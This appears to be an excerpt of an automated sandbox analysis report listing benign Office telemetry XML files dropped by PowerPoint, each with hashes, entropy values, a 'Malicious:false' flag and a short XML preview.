                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140204" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PresenterViewUsage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqws" />.. </S>.. <C T="B" I="0" O="false" N="UsePresenterView">.. <S T="1" F="UsePresenterView" />.. </C>.. <C T="B" I="1" O="false" N="IsPresenterViewDisabled">.. <S T="1" F="IsPresenterViewDisabled" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3713
                                                                                                                              Entropy (8bit):4.293393566897461
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:chZLFkt4epvQcpuGuVPvVq7b8L/BXhCFrIiXDGYxrdHq9oeIpmYpb:THSGg0bcpxC99zZrxq9oeIpmqb
                                                                                                                              MD5:F16A071DB8843328D0AAF3761E9A7588
                                                                                                                              SHA1:864353A11B0C89E640E7FA86DE771DB64769333A
                                                                                                                              SHA-256:01137FB051FF4D19F294BE64F3EEE082ACE19B02552A8E2314D1B9978743397E
                                                                                                                              SHA-512:6EDC4710A6844DACE4E602007ED830840F5E2B3B921B41E34863773E3981D352C2D03910F3C4832177BE174947B0260A5557364EBDF7BE4333CC95209377D3B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140228" V="6" DC="SM" EN="Office.PowerPoint.PPT.CollectConflictDetail" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bihv7" />.. <UTS T="2" Id="av2pu" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="av2pv" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="6" Id="aq7eq" />.. <F T="7">.. <O T="EQ">.. <L>.. <S T="6" F="Tag" />.. </L>.. <R>.. <V V="befej" T="W" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="6" F="Tag" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3607
                                                                                                                              Entropy (8bit):4.28484202668851
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c+Gkt4epvQcpuGuVPvVq7b8L/BXhCFrIiXDGYxrdHq9ZeCpScb:bHSGg0bcpxC99zZrxq9ZeCpScb
                                                                                                                              MD5:FBB4B4843A65C18E8EF098F7818807A5
                                                                                                                              SHA1:AAE02C8A38A211AA459FFA37BC7AEFE83FD2AF3E
                                                                                                                              SHA-256:DEE9E13B691B658BAAC9CC660C47C01A1C6D0C57295C2D0C1A574DDED7EEA3E6
                                                                                                                              SHA-512:5786743F155CB2FB564C3187C0ED09B6B178DB4446D44079306EC036157B5032FCC924337EDB87F2C30EFFF288768AB279CD8BF5F87E33E78ECFA6119E72F72F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140230" V="3" DC="SM" EN="Office.PowerPoint.PPT.CollectConflictDetailSlide" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bk4as" />.. <UTS T="2" Id="av2pu" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="av2pv" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="6" Id="aq7eq" />.. <F T="7">.. <O T="EQ">.. <L>.. <S T="6" F="Tag" />.. </L>.. <R>.. <V V="befej" T="W" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="6" F="Tag" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1239
                                                                                                                              Entropy (8bit):5.036558389004573
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdTrtQCM/GbaAQierioUFqU5OpYxuFnvuXnN1D1oWNHP3gxhhHk2uBl7PffNOQ:2dHnirCIwbcSN1ujYJ
                                                                                                                              MD5:3999DE9419159F03281A9F6F83703695
                                                                                                                              SHA1:410348D9B714C238E4F81D312DC5254939A3743C
                                                                                                                              SHA-256:317831C1FA5188E75B3EDCD18872573EC1C055188AE3759618856020D8B59E6E
                                                                                                                              SHA-512:3C8052F936575E910E06D4CD3112AE2443BB1E29FBCA1A7249F0EBF9CEA5A6C0DA43CB9C4F1681354DC3D039C53D98898F3B8BB5B111E5939FAD15B3C0FBB903
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140231" V="0" DC="SM" EN="Office.PowerPoint.CoAuthShapeTransformDiff" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl8m1" />.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="1" O="false" N="CreationId">.. <S T="1" F="CreationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="BaseShapeID">.. <S T="1" F="baseSpId" M="Ignore" />.. </C>.. <C T="U32" I="3" O="false" N="ReviewerShapeID">.. <S T="1" F="revSpId" M="Ignore" />.. </C>.. <C T="U32" I="4" O="false" N="ThresholdInEmu">.. <S T="1" F="ThresholdInEmu" M="Ignore" />.. </C>.. <C T="U32" I="5" O="false" N="DiffExtentsX">.. <S T="1" F="Diff Extents.x" M="Ignore" />.. </C>.. <C T="U32" I="6" O="false" N="DiffExtentsY">.. <S T="1" F="Diff Extents.y" M="Ignore" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1600
                                                                                                                              Entropy (8bit):4.982618281035085
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdecKg/GbHerD8rGUF9tDGhp9Ov8c45oICbvioCkN1xG/v/eHCbvMRRkrPrDbW:2dvy+r+353Z1ujkRw3bUHyK4nrZId
                                                                                                                              MD5:543241174C553F54B92712F645961E3D
                                                                                                                              SHA1:7F615B95EC0BDC164A455C22604CAF90143B1B5D
                                                                                                                              SHA-256:965367AE48F7DEDB71CAE323633E0D8EC4C932A096E5573E8A0C6E2DA67DBF30
                                                                                                                              SHA-512:03534453549CB14E3C382286C77BA66A01A58E356C0A15D9F17D20815786E6829F7745E62BCC896F9FEDF3B594FBEC8E669BFEA181036B7EAC80748D033B42CC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140232" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.DocumentChanges" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmv45" />.. </S>.. <C T="G" I="0" O="true" N="UlsCorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="G" I="1" O="true" N="ChangeCorrelationId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="DocumentChangeDetails">.. <S T="1" F="Document" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="ContentMasterChangeDetails">.. <S T="1" F="ContentMaster" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="SectionChangeDetails">.. <S T="1" F="Section" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="MainMasterChangeDetails">.. <S T="1" F="MainMaster" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="CommentAuthorChangeDetails">.. <S T="1" F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1974
                                                                                                                              Entropy (8bit):4.930376611453916
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d8fi+r953zw8ND1MYL0o3QcscoYTnZeb2cNMh6b1U:ceHJ53vNJMJidsjwnZeb2cSa1U
                                                                                                                              MD5:FB19D4BD37B58AFCC5C0564806DDC22C
                                                                                                                              SHA1:1F0B30FA0049036FBCEDCC1D594E0491D3A34776
                                                                                                                              SHA-256:FD648C5B0B5964C75DAB6365B2BB93FE1A06EB75DA391847250518B9F8B2C042
                                                                                                                              SHA-512:068EFD18AB56172017E3F6DEE4A5635301D75D313BE5E9BEAB2D59CB9278F6644D3B2F7894457DF4E695DA13E48F781B779E3060C0C25F41948E86FC386D48C6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140233" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.SlideChanges" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmv46" />.. </S>.. <C T="G" I="0" O="true" N="UlsCorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="G" I="1" O="true" N="ChangeCorrelationId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="CreationId">.. <S T="1" F="CreationID" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="SlideChangeDetails">.. <S T="1" F="Slide" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="ShapeChangeDetails">.. <S T="1" F="Shape" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="TextBodyChangeDetails">.. <S T="1" F="TextBody" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="E2oFrameChangeDetails">.. <S T="1" F="E2oFrame" M="Ignore" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3240
                                                                                                                              Entropy (8bit):4.246439366164944
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c1Mkt4epvQcpuGuVPvVq7b8L/BXhCFrIiXDGYxrdHI91ek4kX:iHSGg0bcpxC99zZrxI91ek4kX
                                                                                                                              MD5:73CC6A71E66B6204C7EB4EFF1DB385FD
                                                                                                                              SHA1:72403CCF07033888F04614340AA2397F026143B9
                                                                                                                              SHA-256:70E28EA4D2B6D0DA08C9D00E327E3A7B4C857AD04F94CFD0FFFACB02827AC5C2
                                                                                                                              SHA-512:68AE2D892F3A25B934AA6A76FA4F1C6276BD4A9EBCE1588762F0DDC0D4B3A542F6F90496F39D5590777D6001751BC00FB2E1D3B0A3477C22834C6AB8E56135AA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140242" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.CollectConflictDetailDoc" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="chxn8" />.. <UTS T="2" Id="av2pu" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="av2pv" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="6" Id="aq7eq" />.. <F T="7">.. <O T="EQ">.. <L>.. <S T="6" F="Tag" />.. </L>.. <R>.. <V V="befej" T="W" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="6" F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1394
                                                                                                                              Entropy (8bit):4.71259475911388
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d6P9Y9NYrXuyKgFt4KbrGwOacJfrUPhZZaDr+:c39mzuyht4caQcpUZZaDr+
                                                                                                                              MD5:246A6A7AB4D81F899A5FA24DCCAFF0D0
                                                                                                                              SHA1:764063D55CED06CC30C61225A8FC284287077458
                                                                                                                              SHA-256:87818FE99BE3D411801EDCEA8CBBB2B7CBCD117C5F786B94244FD302A18CEEC1
                                                                                                                              SHA-512:5F62AA0CBC712E6618FAAF6D9E94235CF7A81B245BD78DBDD524119620333AF8E766E79945D55FACD317B0FDF5A6AE8EABC59696E84F304D4CDB131F88F582B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140243" V="3" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.DiffValidation" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cdxu0" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="DiffContext" />.. </L>.. <R>.. <V V="2" T="U32" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="DiffContext" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="av2pu" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="6" Id="av2pt" />.. </S>.. <C T="U32" I="0" O="true" N="WorkingUnmatchedEditCount">.. <S T="3" F="UnmatchedEditCou
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):652
                                                                                                                              Entropy (8bit):5.3157223941675715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHducbjxp/GbaAQzWnerwOzq7SVHyaiuCyp9zsf2YlfQxNO2su:2df3x4Yr74usOYlI3
                                                                                                                              MD5:2CD838D66DA563AE7AF7317887AA13A7
                                                                                                                              SHA1:C6C64D6F43104FBBB063F08901D76D8F319C5F7D
                                                                                                                              SHA-256:E7A6DD45DC786EDB2334850A201ACD4DB81A0AB2F99AA2533752E23D1FB7B9D8
                                                                                                                              SHA-512:F21B96EBB70F3A0FA252C74EC02575427E90E940727A10577ABB4156EC5E6EAB7B31D0BF4BFF75CA3A5316FD3B13BBCA5981ED1DA5194333C6891FEF8E3F44B1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140244" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.ShapeDiffValidationBW" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cdxux" />.. </S>.. <C T="U32" I="0" O="true" N="WorkingUnmatchedSlideID">.. <S T="1" F="SlideID" />.. </C>.. <C T="U32" I="1" O="true" N="WorkingUnmatchedShapeID">.. <S T="1" F="DEBas_ID" />.. </C>.. <C T="U32" I="2" O="true" N="WorkingUnmatchedDEType">.. <S T="1" F="DrawingElementType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):655
                                                                                                                              Entropy (8bit):5.285508226864837
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdvcbjx5HFS/GbaAQzWnereFDz287SVHya28uCyp92lsf2YlfQxNO2su:2dE3xZFNYr3zLsOYlI3
                                                                                                                              MD5:68A5BA9BCE7C8D96952E8C72AC94B4CD
                                                                                                                              SHA1:BCE66299E89EAA60A21D9B5F8D5457F28A6D9AC0
                                                                                                                              SHA-256:ABC34FF574F0E060F8BDB8EF7158729321F0AD3A62CA390CC5DE5E452C08F570
                                                                                                                              SHA-512:DC77CDCC082D3C48A1CCD7513EF55D04DDDBB06CB2351E45F59C8130934581AD7F756610B827A51EF2D55302A355F2A5574232C6DF7D35CC6787E3E4389BC7E1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140245" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.ShapeDiffValidationBD" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cfqbm" />.. </S>.. <C T="U32" I="0" O="true" N="DownloadUnmatchedSlideID">.. <S T="1" F="SlideID" />.. </C>.. <C T="U32" I="1" O="true" N="DownloadUnmatchedShapeID">.. <S T="1" F="DEBas_ID" />.. </C>.. <C T="U32" I="2" O="true" N="DownloadUnmatchedDEType">.. <S T="1" F="DrawingElementType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):534
                                                                                                                              Entropy (8bit):5.275566365775326
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQcfnxp/GbaAQzWnerYzq7SVHyaYoSYyNO2su:2dVfnx4Yr0BPi
                                                                                                                              MD5:FA35B9B19041244D8BB097576F5635D4
                                                                                                                              SHA1:139E4BC855F3762ED93F7CF1305F5E95547BEFF5
                                                                                                                              SHA-256:307AAC7760019266BA517DC9843A1C03D156E9BD01BC436FD385E5453C97D203
                                                                                                                              SHA-512:201B2F792E294EE59812CA768CD11A5D10B77FD7A8FE9FC52AE4CBE163BB85C4BD2306D03F88AEE771D915FA45D89521468493C57114262A823139F2E4FE99ED
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140246" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.SlideDiffValidationBW" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cmj2c" />.. </S>.. <C T="U32" I="0" O="true" N="WorkingUnmatchedSlideID">.. <S T="1" F="SlideID" />.. </C>.. <C T="U32" I="1" O="true" N="DiffCategories">.. <S T="1" F="Diff" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):535
                                                                                                                              Entropy (8bit):5.254694770968369
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdGVcfnx5HFS/GbaAQzWnerZDz287SVHyaYoSYyNO2su:2dbfnxZFNYrZQBPi
                                                                                                                              MD5:58F39A2894BFB465F50D7A76550313DC
                                                                                                                              SHA1:F9B6C103574C42C78CC2D710A504E3C754F978D8
                                                                                                                              SHA-256:2F2EA2B0F3D61FAAA0114E0DD33F86BDBDBAF1E96BEE3414EF911B68D1F930FA
                                                                                                                              SHA-512:B941AE0AFBF6415D72128E961558041E966453EED8F3EBED086E19BAF0788B92182E8B292F981ED8161E480A0327555EEE92CCA9AA207333FAFB76259510533E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140247" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.SlideDiffValidationBD" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cmj2d" />.. </S>.. <C T="U32" I="0" O="true" N="DownloadUnmatchedSlideID">.. <S T="1" F="SlideID" />.. </C>.. <C T="U32" I="1" O="true" N="DiffCategories">.. <S T="1" F="Diff" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1658
                                                                                                                              Entropy (8bit):4.684847748827976
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dscYrNrIt4eJfrbwOacJyx9I65hkY+lyUpQ660F7:cU5kt4epvQcC915hkJ0L50F7
                                                                                                                              MD5:37D0BE5AC4DEB707B6A8FDC075CF0E8D
                                                                                                                              SHA1:723E00A5296DB474D6C294681C92DD1EDE0CADC5
                                                                                                                              SHA-256:0F010E6B7BB256EB56F6CA03620FBA5AF3470E7507F7A17EB698A723B3EBC5AE
                                                                                                                              SHA-512:B808B4DA7C983C32DD5A907A6CADC3C757673CE4D2AF69A931FFA89D4A26BB0B6E96E1AC377D9814B5CACC4A34FE35416AEDBC9A30317325CF48CFFAF7FF6D3B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140248" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.CollectConflictDetailSection" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ckob1" />.. <UTS T="2" Id="av2pu" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <UTS T="4" Id="av2pv" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="4" F="Operation" />.. </L>.. <R>.. <V V="Merge" T="W" />.. </R>.. </O>.. </F>.. <US T="6">.. <S T="3" />.. <S T="5" />.. </US>.. </S>.. <G>.. <S T="1">.. <F N="SectionGuid" />.. <F N="Type" />.. <F N="Diff" />.. <F N="Detail" />.. </S>.. </G>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):444
                                                                                                                              Entropy (8bit):4.346250070198749
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZLberF/+u/xH/Os6IA7YNX/c//tpONGDGIA7YMNOjsu:2dZOrFGuVr72J
                                                                                                                              MD5:B959AB8988EECC92A55D157291E7D9F4
                                                                                                                              SHA1:14AD645498634363715A6725F460FCE71B71478D
                                                                                                                              SHA-256:A15CADBA51AF949C1BB1A0076971FB6DFEC63A834E3CFB81A7D3747F611F7975
                                                                                                                              SHA-512:69EE1EF615BE321FA2DD9CE88BA741DFBFC46DDB2F7845E94919514FCBBF9E968598AA915FD1C1C7A5BB6B23862D975148C6EBD727350D5515DD16654F1979EF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140251" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="aya55" />.. <F T="2">.. <O T="GT">.. <L>.. <S T="1" F="Embedded fonts Count" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false">.. <S T="2" F="Embedded fonts Count" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):779
                                                                                                                              Entropy (8bit):4.840539938667753
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdGcbAVzv/GbSi0D/erEer2+kXqNOWNX/c//gBpONG+AVFnXBytVFnXHhSMNOR:2dXbqaGD2rLrlTTJF8qJYJO7
                                                                                                                              MD5:0BFC74594C969597D55E379E8F57C510
                                                                                                                              SHA1:95F31587E3FCF0F69B1297A37EE522F0A8500E9B
                                                                                                                              SHA-256:3DFB5B1FA60DF0DEBA7B13E03A9C31D3E21337B304D34F51CDBBE5EE4C273020
                                                                                                                              SHA-512:FD9305E2E0421B3D38E99A4EB771EC54BBECAD44AC506F4C6902842FBCF7B161254D53097FDFEE509E53C260E34E493FA2C83993E1820F521037D3DC217053C6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140252" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.Collab.EmbeddedFontsUsage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="140251" />.. <UTS T="2" Id="crzf4" />.. <UTS T="3" Id="av2pu" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="3" F="Operation" />.. </L>.. <R>.. <V V="Open" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="EmbeddedFontsCount">.. <S T="1" F="0" />.. </C>.. <C T="U32" I="1" O="false" N="RestrictedEmbeddedFontsCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <T>.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):451
                                                                                                                              Entropy (8bit):5.320886199638668
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdi4cC7dv/GbaAQ4WnerwykWu/Eo0NO2su:2di9TRrwyVL
                                                                                                                              MD5:C13D72EC14C4F91CA5B09EE53476DEBB
                                                                                                                              SHA1:21FA299323C26D4C9568D1B31455C8C8B424372C
                                                                                                                              SHA-256:BA4FDC078362C6EC9DCA2787F71A1364A78ACA544208E8BAC0F27AEEB09DD960
                                                                                                                              SHA-512:0D27DB59726A729EC7006EC3C4328617036B84B18FB97878E61C49FA5D380E2214556DC2801ACB5C057755EDD9E8070427B3E70DDCB719D0EFCE723415B16DFF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140254" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.FileIO.SerializationError" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="c0xgb" />.. </S>.. <C T="W" I="0" O="false" N="SerializationErrorDetail">.. <S T="1" F="Error Description" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):424
                                                                                                                              Entropy (8bit):5.326994704705937
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHddLr+BaSi/GbSerFHsQPkXQBxNO2su:2dsaSdFrFhMo
                                                                                                                              MD5:29153AA658A5128FECB68829F960F07F
                                                                                                                              SHA1:9BA12A55AAD5B9230EE2E1917CC4DE54993816BC
                                                                                                                              SHA-256:B4AE0FF6C886350B53DA0F719022EE17304DEC5A95E004A0D919BEDEE2F9F908
